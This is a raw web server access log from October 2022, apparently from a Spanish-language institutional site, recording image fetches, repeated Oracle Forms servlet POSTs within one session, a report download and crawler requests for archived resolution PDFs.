200.118.64.109 - - [17/Oct/2022:15:27:25 -0500] "GET /imagenes/exit.gif HTTP/1.1" 200 916
200.118.64.109 - - [17/Oct/2022:15:27:25 -0500] "GET /imagenes/LISTVAL.gif HTTP/1.1" 200 905
200.118.64.109 - - [17/Oct/2022:15:27:25 -0500] "GET /imagenes/edit.gif HTTP/1.1" 200 919
200.118.64.109 - - [17/Oct/2022:15:27:25 -0500] "GET /imagenes/rt_rec4.gif HTTP/1.1" 200 865
200.118.64.109 - - [17/Oct/2022:15:27:25 -0500] "GET /imagenes/rt_rec3.gif HTTP/1.1" 200 844
200.118.64.109 - - [17/Oct/2022:15:27:25 -0500] "GET /imagenes/rt_rec2.gif HTTP/1.1" 200 847
200.118.64.109 - - [17/Oct/2022:15:27:25 -0500] "GET /imagenes/rt_rdel.gif HTTP/1.1" 200 899
200.118.64.109 - - [17/Oct/2022:15:27:26 -0500] "GET /imagenes/rt_radd.gif HTTP/1.1" 200 907
200.118.64.109 - - [17/Oct/2022:15:27:26 -0500] "GET /imagenes/rt_quer3.gif HTTP/1.1" 200 939
200.118.64.109 - - [17/Oct/2022:15:27:26 -0500] "GET /imagenes/rt_quer2.gif HTTP/1.1" 200 936
200.118.64.109 - - [17/Oct/2022:15:27:26 -0500] "GET /imagenes/rt_quer1.gif HTTP/1.1" 200 930
200.118.64.109 - - [17/Oct/2022:15:27:26 -0500] "GET /imagenes/rt_save.gif HTTP/1.1" 200 903
200.118.64.109 - - [17/Oct/2022:15:27:26 -0500] "GET /imagenes/rt_pset.gif HTTP/1.1" 200 914
200.118.64.109 - - [17/Oct/2022:15:27:26 -0500] "GET /imagenes/QUEJA.gif HTTP/1.1" 200 1091
200.118.64.109 - - [17/Oct/2022:15:27:26 -0500] "GET /imagenes/ARBOL.gif HTTP/1.1" 200 1026
200.118.64.109 - - [17/Oct/2022:15:27:26 -0500] "GET /imagenes/Clipboard.gif HTTP/1.1" 200 1466
200.118.64.109 - - [17/Oct/2022:15:27:26 -0500] "GET /imagenes/DINERO.gif HTTP/1.1" 200 1766
200.118.64.109 - - [17/Oct/2022:15:27:26 -0500] "GET /imagenes/URGENTE.gif HTTP/1.1" 200 964
200.118.64.109 - - [17/Oct/2022:15:27:27 -0500] "GET /imagenes/TREE4.gif HTTP/1.1" 200 4150
200.118.64.109 - - [17/Oct/2022:15:27:27 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6fa10bf5564c347bebf8f92dd389e65e0.e3iSbxaKaheRe34Qa3aKah8Rby1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 7
200.118.64.109 - - [17/Oct/2022:15:27:27 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6fa10bf5564c347bebf8f92dd389e65e0.e3iSbxaKaheRe34Qa3aKah8Rby1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 34
200.118.64.109 - - [17/Oct/2022:15:27:27 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6fa10bf5564c347bebf8f92dd389e65e0.e3iSbxaKaheRe34Qa3aKah8Rby1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
200.118.64.109 - - [17/Oct/2022:15:27:29 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6fa10bf5564c347bebf8f92dd389e65e0.e3iSbxaKaheRe34Qa3aKah8Rby1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
200.118.64.109 - - [17/Oct/2022:15:27:29 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6fa10bf5564c347bebf8f92dd389e65e0.e3iSbxaKaheRe34Qa3aKah8Rby1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 699
200.118.64.109 - - [17/Oct/2022:15:27:29 -0500] "GET /imagenes/Srch_frw.gif HTTP/1.1" 200 925
200.118.64.109 - - [17/Oct/2022:15:27:29 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6fa10bf5564c347bebf8f92dd389e65e0.e3iSbxaKaheRe34Qa3aKah8Rby1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 10
200.118.64.109 - - [17/Oct/2022:15:27:36 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6fa10bf5564c347bebf8f92dd389e65e0.e3iSbxaKaheRe34Qa3aKah8Rby1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 24
200.118.64.109 - - [17/Oct/2022:15:27:37 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6fa10bf5564c347bebf8f92dd389e65e0.e3iSbxaKaheRe34Qa3aKah8Rby1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 14
200.118.64.109 - - [17/Oct/2022:15:27:38 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6fa10bf5564c347bebf8f92dd389e65e0.e3iSbxaKaheRe34Qa3aKah8Rby1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 14
200.118.64.109 - - [17/Oct/2022:15:27:39 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6fa10bf5564c347bebf8f92dd389e65e0.e3iSbxaKaheRe34Qa3aKah8Rby1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 14
200.118.64.109 - - [17/Oct/2022:15:27:41 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6fa10bf5564c347bebf8f92dd389e65e0.e3iSbxaKaheRe34Qa3aKah8Rby1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 4368
200.118.64.109 - - [17/Oct/2022:15:27:41 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6fa10bf5564c347bebf8f92dd389e65e0.e3iSbxaKaheRe34Qa3aKah8Rby1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
200.118.64.109 - - [17/Oct/2022:15:27:51 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6fa10bf5564c347bebf8f92dd389e65e0.e3iSbxaKaheRe34Qa3aKah8Rby1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [17/Oct/2022:15:27:50 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43296
200.118.64.109 - - [17/Oct/2022:15:27:51 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6fa10bf5564c347bebf8f92dd389e65e0.e3iSbxaKaheRe34Qa3aKah8Rby1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 14
200.118.64.109 - - [17/Oct/2022:15:27:52 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6fa10bf5564c347bebf8f92dd389e65e0.e3iSbxaKaheRe34Qa3aKah8Rby1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 14
200.118.64.109 - - [17/Oct/2022:15:27:53 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6fa10bf5564c347bebf8f92dd389e65e0.e3iSbxaKaheRe34Qa3aKah8Rby1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 14
200.118.64.109 - - [17/Oct/2022:15:27:55 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6fa10bf5564c347bebf8f92dd389e65e0.e3iSbxaKaheRe34Qa3aKah8Rby1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 14
114.119.141.73 - - [17/Oct/2022:15:27:58 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202010/5052.pdf HTTP/1.1" 200 763507
200.118.64.109 - - [17/Oct/2022:15:27:57 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6fa10bf5564c347bebf8f92dd389e65e0.e3iSbxaKaheRe34Qa3aKah8Rby1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 15
200.118.64.109 - - [17/Oct/2022:15:27:59 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6fa10bf5564c347bebf8f92dd389e65e0.e3iSbxaKaheRe34Qa3aKah8Rby1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 15
200.118.64.109 - - [17/Oct/2022:15:28:04 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6fa10bf5564c347bebf8f92dd389e65e0.e3iSbxaKaheRe34Qa3aKah8Rby1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 15
200.118.64.109 - - [17/Oct/2022:15:28:11 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6fa10bf5564c347bebf8f92dd389e65e0.e3iSbxaKaheRe34Qa3aKah8Rby1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 15
200.118.64.109 - - [17/Oct/2022:15:28:20 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6fa10bf5564c347bebf8f92dd389e65e0.e3iSbxaKaheRe34Qa3aKah8Rby1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 125
200.118.64.109 - - [17/Oct/2022:15:28:21 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6fa10bf5564c347bebf8f92dd389e65e0.e3iSbxaKaheRe34Qa3aKah8Rby1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
200.118.64.109 - - [17/Oct/2022:15:28:21 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6fa10bf5564c347bebf8f92dd389e65e0.e3iSbxaKaheRe34Qa3aKah8Rby1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 125
200.118.64.109 - - [17/Oct/2022:15:28:21 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6fa10bf5564c347bebf8f92dd389e65e0.e3iSbxaKaheRe34Qa3aKah8Rby1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 215
200.118.64.109 - - [17/Oct/2022:15:28:21 -0500] "GET /reports/rwservlet/getjobid80568?server=repnomi HTTP/1.1" 200 4223923
200.118.64.109 - - [17/Oct/2022:15:28:55 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6fa10bf5564c347bebf8f92dd389e65e0.e3iSbxaKaheRe34Qa3aKah8Rby1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
66.249.73.127 - - [17/Oct/2022:15:29:13 -0500] "-" 408 -
114.119.141.53 - - [17/Oct/2022:15:29:40 -0500] "GET /BLA/resoluciones/AUTOS%202011/7642.pdf HTTP/1.1" 200 402580
172.22.2.1 - - [17/Oct/2022:15:30:05 -0500] "GET /reportes_sipse/sdg/ServletFirma?solicitud=18681 HTTP/1.1" 200 -
200.118.64.109 - - [17/Oct/2022:15:30:56 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6fa10bf5564c347bebf8f92dd389e65e0.e3iSbxaKaheRe34Qa3aKah8Rby1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
114.119.141.71 - - [17/Oct/2022:15:31:28 -0500] "GET /Autoliquidacion/index.php?dir=Solicitud%20de%20Clasificaci%C3%83%C2%83%C3%82%C2%83%C3%83%C2%82%C3%82%C2%83%C3%83%C2%83%C3%82%C2%82%C3%83%C2%82%C3%82%C2%83%C3%83%C2%83%C3%82%C2%83%C3%83%C2%82%C3%82%C2%82%C3%83%C2%83%C3%82%C2%82%C3%83%C2%82%C3%82%C2%AF%C3%83%C2%83%C3%82%C2%83%C3%83%C2%82%C3%82%C2%83%C3%83%C2%83%C3%82%C2%82%C3%83%C2%82%C3%82%C2%82%C3%83%C2%83%C3%82%C2%83%C3%83%C2%82%C3%82%C2%82%C3%83%C2%83%C3%82%C2%82%C3%83%C2%82%C3%82%C2%BF%C3%83%C2%83%C3%82%C2%83%C3%83%C2%82%C3%82%C2%83%C3%83%C2%83%C3%82%C2%82%C3%83%C2%82%C3%82%C2%82%C3%83%C2%83%C3%82%C2%83%C3%83%C2%82%C3%82%C2%82%C3%83%C2%83%C3%82%C2%82%C3%83%C2%82%C3%82%C2%BDn%20de%20Impacto%20Ambiental/&sort=name&order=asc HTTP/1.1" 200 7498
200.118.64.109 - - [17/Oct/2022:15:31:29 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6fa10bf5564c347bebf8f92dd389e65e0.e3iSbxaKaheRe34Qa3aKah8Rby1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
200.118.64.109 - - [17/Oct/2022:15:31:29 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6fa10bf5564c347bebf8f92dd389e65e0.e3iSbxaKaheRe34Qa3aKah8Rby1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 14
200.118.64.109 - - [17/Oct/2022:15:31:30 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6fa10bf5564c347bebf8f92dd389e65e0.e3iSbxaKaheRe34Qa3aKah8Rby1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 14
200.118.64.109 - - [17/Oct/2022:15:31:32 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6fa10bf5564c347bebf8f92dd389e65e0.e3iSbxaKaheRe34Qa3aKah8Rby1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 14
